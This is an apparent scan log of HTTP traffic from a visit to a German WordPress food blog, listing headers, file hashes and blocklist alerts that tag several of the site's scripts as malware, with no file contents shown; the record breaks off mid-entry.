                                            GET /wp-content/themes/h-k-foodies/js/jquery.pngFix.pack.js?ver=4.5.28 HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Content-Length: 2485
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:54 GMT
Server: Apache
Last-Modified: Mon, 09 Mar 2009 19:16:44 GMT
ETag: "9b5-464b4799bff00"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (2125)
Size:   2485
Md5:    2aca4064e52647007dde42adf10d2d0e
Sha1:   0b39a332735a94ae55d8e0f29533c1139fce3107
Sha256: 6ac7e0fba9030560ea4cab11495952c5933445fc5e583ca61eb20b1c57d70950

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/wp-lightbox-ultimate/lib/js/prettyPhoto.js?ver=4.5.28 HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Content-Length: 25216
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:54 GMT
Server: Apache
Last-Modified: Wed, 21 Mar 2012 11:08:56 GMT
ETag: "6280-4bbbed1454200"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  HTML document text\012- HTML document, ASCII text, with very long lines (3572)
Size:   25216
Md5:    df5ed82a0659a0b31cd84d656d8637c9
Sha1:   4452fc2e60a0d1a682cf465b9e27b0713cfcdf4f
Sha256: e117353e17f7c89acc2053a5298324797da12d6ab31cab0fdaf0cae822ab28d2
                                        
                                            GET /wp-content/plugins/form-lightbox/colorbox/jquery.colorbox-min.js?ver=1.4.33 HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Content-Length: 11095
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:54 GMT
Server: Apache
Last-Modified: Fri, 29 Jan 2016 07:50:02 GMT
ETag: "2b57-52a74485a3e80"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (10897)
Size:   11095
Md5:    2c381fee3e12193d17c2ed14d2cbcffa
Sha1:   c3d9e0d135b9d450dc9dcd55740b99ed82329e0a
Sha256: 04267038608d360c78254e55ab98e75045067567996e7dc7f1501784718dabbe
                                        
                                            GET /wp-content/plugins/search-autocomplete/includes/jquery-ui-1.8.9.custom.min.js?ver=1.0.0 HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Content-Length: 20093
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:54 GMT
Server: Apache
Last-Modified: Tue, 07 Jun 2011 10:05:21 GMT
ETag: "4e7d-4a51c5b94fa40"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (641)
Size:   20093
Md5:    c4ad91ce507d5baa889e93c83c39dc36
Sha1:   97fa6493a2ab20df8496eac2fcfdae2ab6a6f9da
Sha256: d85dc6ba1d26c8c421a27f954ffd40814617ac25f839f5f12dcffef93333e855

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/h-k-foodies/random-background_css.php?ver=4.5.28 HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:54 GMT
Server: Apache


--- Additional Info ---
Magic:  ASCII text
Size:   100
Md5:    ef6406b6ea31963e3f2722bdc1df0dcb
Sha1:   b5d0e5f06f6460bf4ac7ce157961676d510b601b
Sha256: b5722d0d29e9f3157a688164bb79bb56f7d4d9c7dd7df57e5fa8ce40067bffb9
                                        
                                            GET /wp-includes/js/swfobject.js?ver=2.2-20120417 HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Content-Length: 10231
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:54 GMT
Server: Apache
Last-Modified: Fri, 29 Jan 2016 07:42:45 GMT
ETag: "27f7-52a742e4e2740"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (10082)
Size:   10231
Md5:    9ffdba2cff497d701684657e329871f5
Sha1:   693465e9d9376fd4d2fcd45ffc24f735e1159312
Sha256: 5fc71212d5f80194f946cc9239d030aae8b51879ec22bd6f9a793c49e543d1c0

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/wp-lightbox-ultimate/lib/css/wp_lightbox_ultimate.css HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Content-Length: 1711
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:54 GMT
Server: Apache
Last-Modified: Tue, 22 Nov 2011 12:53:14 GMT
ETag: "6af-4b2524951c280"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text
Size:   1711
Md5:    f9a93322c4cccfdb6c52a50d6af78080
Sha1:   a4d5f8d34d64cb8f8e66dabea53a368a732ad4ce
Sha256: 77863e9e253e397b8f7a3130b8016132645c05e104a947a9699c702f5fd83294
                                        
                                            GET /wp-content/plugins/wp-lightbox-ultimate/lib/css/prettyPhoto.css HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Content-Length: 20188
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:54 GMT
Server: Apache
Last-Modified: Wed, 21 Mar 2012 11:08:56 GMT
ETag: "4edc-4bbbed1454200"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (402)
Size:   20188
Md5:    97b7e56e54d9a3282637feb0364d2468
Sha1:   d026b8a2fc1b8b5c693e4d738b47f9e8981e8cf2
Sha256: 2eb307016faf420df833cf5bb0d6767ee0ffb1a7f65ff74403979212608cf64b
                                        
                                            GET /wp-includes/js/wp-embed.min.js?ver=4.5.28 HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Content-Length: 1384
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:54 GMT
Server: Apache
Last-Modified: Thu, 13 May 2021 03:08:22 GMT
ETag: "568-5c22d709f06e9"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (1384), with no line terminators
Size:   1384
Md5:    2a9a2f64687bc94523f4c50c9335cc0f
Sha1:   33c874cafe5df3ea8c8756be8642f675f9cf5289
Sha256: 4114f99c5992bab27f43ae5e3c7c196ce63fac0b4b43915af913c1a30ca1f3da

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/plugins/wp-lightbox-ultimate/wp_lightbox_ultimate_custom.css HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Content-Length: 580
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:54 GMT
Server: Apache
Last-Modified: Fri, 13 Apr 2012 14:26:44 GMT
ETag: "244-4bd9043023100"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text
Size:   580
Md5:    61a80d6e60d1c7c321644bc8987fbb56
Sha1:   c24e02169d3f57d2b68c21618a6f50957ce384f8
Sha256: 07c15d2dfde1bea6537ff7d35609ba5743ad994614992c42e3deb5868cebb2a5
                                        
                                            GET /wp-content/themes/twentyten/style.css HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/wp-content/themes/h-k-foodies/style.css

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Content-Length: 22817
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:54 GMT
Server: Apache
Last-Modified: Thu, 21 Jul 2011 08:02:28 GMT
ETag: "5921-4a88fc5226d00"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines (535)
Size:   22817
Md5:    5f30a2e89835401b978206a287b445fb
Sha1:   78f11104e8325a53459037e6133edb6f1a0da1ca
Sha256: 4361d357f4e7d04fd8ad050cdcd7dbc5ed4fb26eeb8d688b989b4f1758463f71
                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: JHEch4arC4ILRzxpGAy8Tw==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

search
                                         52.35.167.249
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: BOD29v7MZj3NWWplOs7RVwGN+FE=

                                        
                                            GET /wp-content/plugins/search-autocomplete/autocomplete-scripts.php?ver=1.0.0 HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:54 GMT
Server: Apache


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   364
Md5:    f0461ca64b1c512fae1134b8c8fc9b9e
Sha1:   9c47b98af4a4dffa2442dec830a626b471ccac7f
Sha256: 49516ae108fc712a9d47a81f37c9e1ed257d7a302d0453441736fa9c01f9ef30

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/h-k-foodies/images/nav-left/home.png HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Content-Length: 248
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:55 GMT
Server: Apache
Last-Modified: Tue, 24 May 2011 10:48:00 GMT
ETag: "f8-4a4035254f800"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 21 x 18, 8-bit/color RGBA, non-interlaced\012- data
Size:   248
Md5:    d91ebc5067f51788dfa4e1c576803b43
Sha1:   c2d3c632c198543b9333d3da2400ab9e8c36efe7
Sha256: e5a5c8a80fc322923d2b7cfd2833e51e0425e2b9851b785485bba1fb78fe63e9
                                        
                                            GET /wp-content/themes/h-k-foodies/images/nav-left/arrow-left.png HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Content-Length: 260
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:55 GMT
Server: Apache
Last-Modified: Tue, 24 May 2011 10:48:00 GMT
ETag: "104-4a4035254f800"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 22 x 13, 8-bit/color RGBA, non-interlaced\012- data
Size:   260
Md5:    56295c7e7f77c0448258219abd285574
Sha1:   0e791194eb714f1359ad47bb9f3faf0d4bc34525
Sha256: 48ec17f5b074987177362cb73372dc90266ac601db61fa907ba8435af9b4360e
                                        
                                            GET /wp-content/themes/h-k-foodies/images/headers/befoodie-logo.jpg HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Content-Length: 13982
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:55 GMT
Server: Apache
Last-Modified: Fri, 06 May 2011 14:30:38 GMT
ETag: "369e-4a29c55631f80"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 347x103, components 3\012- data
Size:   13982
Md5:    23db07a4d11a07c8607a9e6517d6c375
Sha1:   b21d79d62fd7e0995dbb24c6d8e0dcf98c935d9c
Sha256: f32486bf2144e41f8fdd6c6660e87e79d806b5bdb485cb5368cc7d44fd4eac76
                                        
                                            GET /wp-content/themes/h-k-foodies/images/random-bg/doodles-5.gif HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/wp-content/themes/h-k-foodies/random-background_css.php?ver=4.5.28

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Content-Length: 16307
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:55 GMT
Server: Apache
Last-Modified: Sat, 07 May 2011 14:11:14 GMT
ETag: "3fb3-4a2b02dd94480"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 1350 x 2000\012- data
Size:   16307
Md5:    dbc95dad0e2f50a3fb6b42b5168dc76d
Sha1:   7ba97356b5588bab07e18ef0c206654d47f5c3d9
Sha256: 11d9ef2cae08d26698ded2030a8cce7e935fd51ab0392c2f58c2439847ace9c4
                                        
                                            GET /wp-content/uploads/2011/09/Von_wegen_viele_Koeche-4.png HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Content-Length: 1120309
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:55 GMT
Server: Apache
Last-Modified: Fri, 02 Sep 2011 06:31:57 GMT
ETag: "111835-4abef84991140"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image data, 860 x 812, 8-bit/color RGBA, interlaced\012- data
Size:   1120309
Md5:    4192b8dd92b1f5d14a86534fad4e46ae
Sha1:   c9ea50dc7263f14caf8276d5c9e1bc01ef9bf13d
Sha256: 03cab9cfbfce24807ec8586f56464b60c551a874fb24990b373ce94c65c7cf90
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0B54FD84CA41B6CEA008515557D86555412AD6A5A3AF083DC1393B85713182F5"
Last-Modified: Wed, 23 Nov 2022 08:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21534
Expires: Thu, 24 Nov 2022 23:14:49 GMT
Date: Thu, 24 Nov 2022 17:15:55 GMT
Connection: keep-alive

                                        
                                            GET /wp-content/themes/h-k-foodies/images/favicon.ico HTTP/1.1 
Host: be-foodie.de
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://be-foodie.de/blog/2011/09/von-wegen-viele-koche/von_wegen_viele_koeche-4/

search
                                         217.160.0.253
HTTP/1.1 200 OK
Content-Type: image/vnd.microsoft.icon
                                        
Content-Length: 3638
Connection: keep-alive
Keep-Alive: timeout=15
Date: Thu, 24 Nov 2022 17:15:55 GMT
Server: Apache
Last-Modified: Sun, 08 May 2011 08:05:05 GMT
ETag: "e36-4a2bf2e3c4e40"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  MS Windows icon resource - 2 icons, 16x16, 8 bits/pixel, 32x32, 8 bits/pixel\012- data
Size:   3638
Md5:    5d4a4037d77e2236d50536dbfcdd492f
Sha1:   8a98efd3126e5fbb64a75ad9663d54ef8e848152
Sha256: b2d8b9c4ddf5850b3d78f70e37ce017486a0622a8157b6fe58c8d10fa69a87a7
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5857
Expires: Thu, 24 Nov 2022 18:53:33 GMT
Date: Thu, 24 Nov 2022 17:15:56 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5857
Expires: Thu, 24 Nov 2022 18:53:33 GMT
Date: Thu, 24 Nov 2022 17:15:56 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E4EF6DDEF97EC03D43DF4C0BADA61D792B9F030E4D9FAB5BD3CF904AEAA3BC9"
Last-Modified: Thu, 24 Nov 2022 09:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5857
Expires: Thu, 24 Nov 2022 18:53:33 GMT
Date: Thu, 24 Nov 2022 17:15:56 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F433fbaf5-7c54-485b-af70-542e1e788832.webp HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 5070
x-amzn-requestid: d86d95ad-9b78-4047-82e7-04e83a97e330
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cEwViF1GIAMF_PQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637e9423-10809ba1634776171cf79cb8;Sampled=0
x-amzn-remapped-date: Wed, 23 Nov 2022 21:44:03 GMT
x-amz-cf-pop: SFO5-P2, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: 8rbsN9OVJmneT9ov-Q7V4RB8DP5UWhhn-7cnukHiBpl06zmMM0zJTg==
via: 1.1 0dc4feb22bb4657ce2bb95fd05ec7122.cloudfront.net (CloudFront), 1.1 d6a002c70d55f415107618b0750d493c.cloudfront.net (CloudFront), 1.1 google
date: Wed, 23 Nov 2022 21:57:20 GMT
age: 69516
etag: "89accd230fba95fe0049678070817b36ead015fa"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   5070
Md5:    0856fdb55f19f03a1bec38b3d6e0ac77
Sha1:   89accd230fba95fe0049678070817b36ead015fa
Sha256: 17c6e6f9bb8f4261fff2dc2a43ed994986418761624b8afead768e89927594f2
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F50d7d834-f80d-4fd9-a728-24643ed00c45.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 6789
x-amzn-requestid: 4d94ce1b-d18f-43b8-bb4d-e7093f9bea42
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cCvd2G9UIAMFrEg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637dc5f2-64a570135be59b83031811da;Sampled=0
x-amzn-remapped-date: Wed, 23 Nov 2022 07:04:18 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: JygkDI7XSvlgurUTot874ZAXlOIqnv4cntMQ55IvHVqw93JBcksZjQ==
via: 1.1 4d7fa73f804f1c93f20cfc24c4b1266e.cloudfront.net (CloudFront), 1.1 57a21088b36c69a83578b5a5579df58e.cloudfront.net (CloudFront), 1.1 google
date: Thu, 24 Nov 2022 07:15:22 GMT
age: 36034
etag: "303c571b13b05fcf27ee1159d8fdf6369aaef0a2"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6789
Md5:    d9d93b2a6875d446c3467eb49767eef5
Sha1:   303c571b13b05fcf27ee1159d8fdf6369aaef0a2
Sha256: 2a2345a925e0187979930a7f2de8548957ad9f2baae77364dcb157286e2b3fcf
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F1dd98515-d0af-440a-8f3d-4c9986928081.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

search
                                         34.120.237.76
